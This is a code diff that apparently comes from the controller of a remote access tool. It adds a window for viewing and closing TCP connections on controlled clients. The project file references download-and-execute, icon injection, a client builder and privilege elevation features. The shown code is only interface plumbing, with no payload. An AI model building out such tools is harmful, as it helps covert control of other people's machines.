@ -869,6 +877,7 @@ namespace xServer.Forms
private System.Windows.Forms.StatusStrip statusStrip;
private System.Windows.Forms.ToolStripStatusLabel listenToolStripStatusLabel;
private System.Windows.Forms.ToolStripMenuItem elevateClientPermissionsToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem connectionsToolStripMenuItem;
}
}

13
Server/Forms/FrmMain.cs
View File

@ -876,9 +876,18 @@ namespace xServer.Forms
#endregion
private void contextMenuStrip_Opening(object sender, System.ComponentModel.CancelEventArgs e)
private void connectionsToolStripMenuItem_Click(object sender, EventArgs e)
{
foreach (Client c in GetSelectedClients())
{
if (c.Value.FrmCon != null)
{
c.Value.FrmCon.Focus();
return;
}
FrmConnections frmCON = new FrmConnections(c);
frmCON.Show();
}
}
}
}

13
Server/Server.csproj
View File

@ -90,6 +90,7 @@
<Compile Include="Controls\RegistryValueLstItem.cs" />
<Compile Include="Core\Build\IconInjector.cs" />
<Compile Include="Core\Commands\RegistryHandler.cs" />
<Compile Include="Core\Commands\TCPConnectionsHandler.cs" />
<Compile Include="Core\Data\AutostartItem.cs" />
<Compile Include="Core\Data\BuildOptions.cs" />
<Compile Include="Core\Data\DownloadAndExecute.cs" />
@ -154,6 +155,7 @@
<Compile Include="Core\NetSerializer\TypeSerializers\ObjectSerializer.cs" />
<Compile Include="Core\NetSerializer\TypeSerializers\PrimitivesSerializer.cs" />
<Compile Include="Core\Packets\ClientPackets\GetChangeRegistryValueResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetConnectionsResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetCreateRegistryKeyResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetCreateRegistryValueResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetDeleteRegistryKeyResponse.cs" />
@ -164,6 +166,7 @@
<Compile Include="Core\Packets\ClientPackets\SetStatusFileManager.cs" />
<Compile Include="Core\Packets\ServerPackets\DoAskElevate.cs" />
<Compile Include="Core\Packets\ServerPackets\DoChangeRegistryValue.cs" />
<Compile Include="Core\Packets\ServerPackets\DoCloseConnection.cs" />
<Compile Include="Core\Packets\ServerPackets\DoCreateRegistryKey.cs" />
<Compile Include="Core\Packets\ServerPackets\DoCreateRegistryValue.cs" />
<Compile Include="Core\Packets\ServerPackets\DoDeleteRegistryKey.cs" />
@ -172,6 +175,7 @@
<Compile Include="Core\Packets\ServerPackets\DoLoadRegistryKey.cs" />
<Compile Include="Core\Packets\ServerPackets\DoRenameRegistryKey.cs" />
<Compile Include="Core\Packets\ServerPackets\DoRenameRegistryValue.cs" />
<Compile Include="Core\Packets\ServerPackets\GetConnections.cs" />
<Compile Include="Core\Packets\ServerPackets\SetAuthenticationSuccess.cs" />
<Compile Include="Core\Registry\RegSeekerMatch.cs" />
<Compile Include="Core\Registry\RegValueData.cs" />
@ -281,6 +285,12 @@
<Compile Include="Forms\FrmBuilder.Designer.cs">
<DependentUpon>FrmBuilder.cs</DependentUpon>
</Compile>
<Compile Include="Forms\FrmConnections.cs">
<SubType>Form</SubType>
</Compile>
<Compile Include="Forms\FrmConnections.Designer.cs">
<DependentUpon>FrmConnections.cs</DependentUpon>
</Compile>
<Compile Include="Forms\FrmDownloadAndExecute.cs">
<SubType>Form</SubType>
</Compile>
@ -434,6 +444,9 @@
<EmbeddedResource Include="Forms\FrmBuilder.resx">
<DependentUpon>FrmBuilder.cs</DependentUpon>
</EmbeddedResource>
<EmbeddedResource Include="Forms\FrmConnections.resx">
<DependentUpon>FrmConnections.cs</DependentUpon>
</EmbeddedResource>
<EmbeddedResource Include="Forms\FrmDownloadAndExecute.resx">
<DependentUpon>FrmDownloadAndExecute.cs</DependentUpon>
</EmbeddedResource>